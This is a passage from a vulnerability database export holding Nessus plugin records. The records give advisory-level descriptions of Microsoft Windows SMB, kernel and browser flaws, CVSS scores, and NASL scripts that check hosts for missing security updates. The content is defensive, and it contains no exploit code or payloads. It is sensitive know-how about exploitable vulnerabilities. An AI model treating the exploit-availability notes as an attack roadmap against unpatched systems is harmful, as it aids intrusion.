requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:54:09", "description": "The remote Windows host is missing security update 4556843 or cumulative update 4556836. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2020-1072)\n\n - An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. 
An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175, CVE-2020-1176)\n\n - An elevation of privilege vulnerability exists in Windows Block Level Backup Engine Service (wbengine) that allows file deletion in arbitrary locations.\n (CVE-2020-1010)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0963, CVE-2020-1179)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1062, CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1150)\n\n - A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code with elevated permissions on a target system. 
(CVE-2020-1067)\n\n - A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC. An attacker who successfully exploited this vulnerability could run arbitrary code as an administrator. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1113)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles errors tied to Remote Access Common Dialog. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges. (CVE-2020-1071)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1035, CVE-2020-1058, CVE-2020-1060, CVE-2020-1093)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-05-12T00:00:00", "type": "nessus", "title": "KB4556843: Windows 7 and Windows Server 2008 R2 May 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0909", "CVE-2020-0963", "CVE-2020-1010", "CVE-2020-1035", "CVE-2020-1048", "CVE-2020-1051", "CVE-2020-1054", "CVE-2020-1058", "CVE-2020-1060", "CVE-2020-1061", "CVE-2020-1062", "CVE-2020-1064", "CVE-2020-1066", "CVE-2020-1067", "CVE-2020-1070", "CVE-2020-1071", "CVE-2020-1072", "CVE-2020-1078", "CVE-2020-1081", "CVE-2020-1092", "CVE-2020-1093", "CVE-2020-1108", "CVE-2020-1112", "CVE-2020-1113", "CVE-2020-1114", "CVE-2020-1116", "CVE-2020-1141", "CVE-2020-1143", "CVE-2020-1150", "CVE-2020-1153", "CVE-2020-1154", "CVE-2020-1174", "CVE-2020-1175", "CVE-2020-1176", "CVE-2020-1179"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAY_4556836.NASL", "href": "https://www.tenable.com/plugins/nessus/136507", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136507);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2020-0909\",\n \"CVE-2020-0963\",\n \"CVE-2020-1010\",\n \"CVE-2020-1035\",\n \"CVE-2020-1048\",\n \"CVE-2020-1051\",\n \"CVE-2020-1054\",\n \"CVE-2020-1058\",\n \"CVE-2020-1060\",\n \"CVE-2020-1061\",\n \"CVE-2020-1062\",\n \"CVE-2020-1064\",\n \"CVE-2020-1066\",\n \"CVE-2020-1067\",\n \"CVE-2020-1070\",\n \"CVE-2020-1071\",\n \"CVE-2020-1072\",\n \"CVE-2020-1078\",\n \"CVE-2020-1081\",\n \"CVE-2020-1092\",\n \"CVE-2020-1093\",\n \"CVE-2020-1108\",\n \"CVE-2020-1112\",\n \"CVE-2020-1113\",\n \"CVE-2020-1114\",\n \"CVE-2020-1116\",\n \"CVE-2020-1141\",\n \"CVE-2020-1143\",\n \"CVE-2020-1150\",\n \"CVE-2020-1153\",\n \"CVE-2020-1154\",\n \"CVE-2020-1174\",\n \"CVE-2020-1175\",\n \"CVE-2020-1176\",\n \"CVE-2020-1179\"\n );\n script_xref(name:\"MSKB\", value:\"4556836\");\n script_xref(name:\"MSKB\", value:\"4556843\");\n script_xref(name:\"MSFT\", value:\"MS20-4556836\");\n script_xref(name:\"MSFT\", value:\"MS20-4556843\");\n script_xref(name:\"IAVA\", value:\"2020-A-0213-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4556843: Windows 7 and Windows Server 2008 R2 May 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4556843\nor cumulative update 4556836. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. 
An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on\n a Windows Server fails to properly handle specially\n crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1072)\n\n - An information disclosure vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175,\n CVE-2020-1176)\n\n - An elevation of privilege vulnerability exists in\n Windows Block Level Backup Engine Service (wbengine)\n that allows file deletion in arbitrary locations.\n (CVE-2020-1010)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2020-1066)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0963, CVE-2020-1179)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1062,\n CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1150)\n\n - A remote code execution vulnerability exists in the way\n that Windows handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could execute\n arbitrary code with elevated permissions on a target\n system. (CVE-2020-1067)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when the Task Scheduler service fails\n to properly verify client connections over RPC. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code as an administrator. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1113)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the\n Windows Printer Service improperly validates file paths\n while loading printer drivers. An authenticated attacker\n who successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Script Runtime handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles errors tied to Remote Access\n Common Dialog. An attacker who successfully exploited\n the vulnerability could run arbitrary code with elevated\n privileges. (CVE-2020-1071)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1035, CVE-2020-1058,\n CVE-2020-1060, CVE-2020-1093)\");\n # https://support.microsoft.com/en-us/help/4556836/windows-7-update-kb4556836\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?20528be0\");\n # https://support.microsoft.com/en-us/help/4556843/windows-7-update-kb4556843\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dcc204d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4556843 or Cumulative Update KB4556836.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1176\");\n script_set_attribute(attribute:\"cvss3_score_source\", 
value:\"CVE-2020-1112\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n '4556836',\n '4556843'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'05_2020',\n bulletin:bulletin,\n rollup_kb_list:[4556836, 4556843])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. 
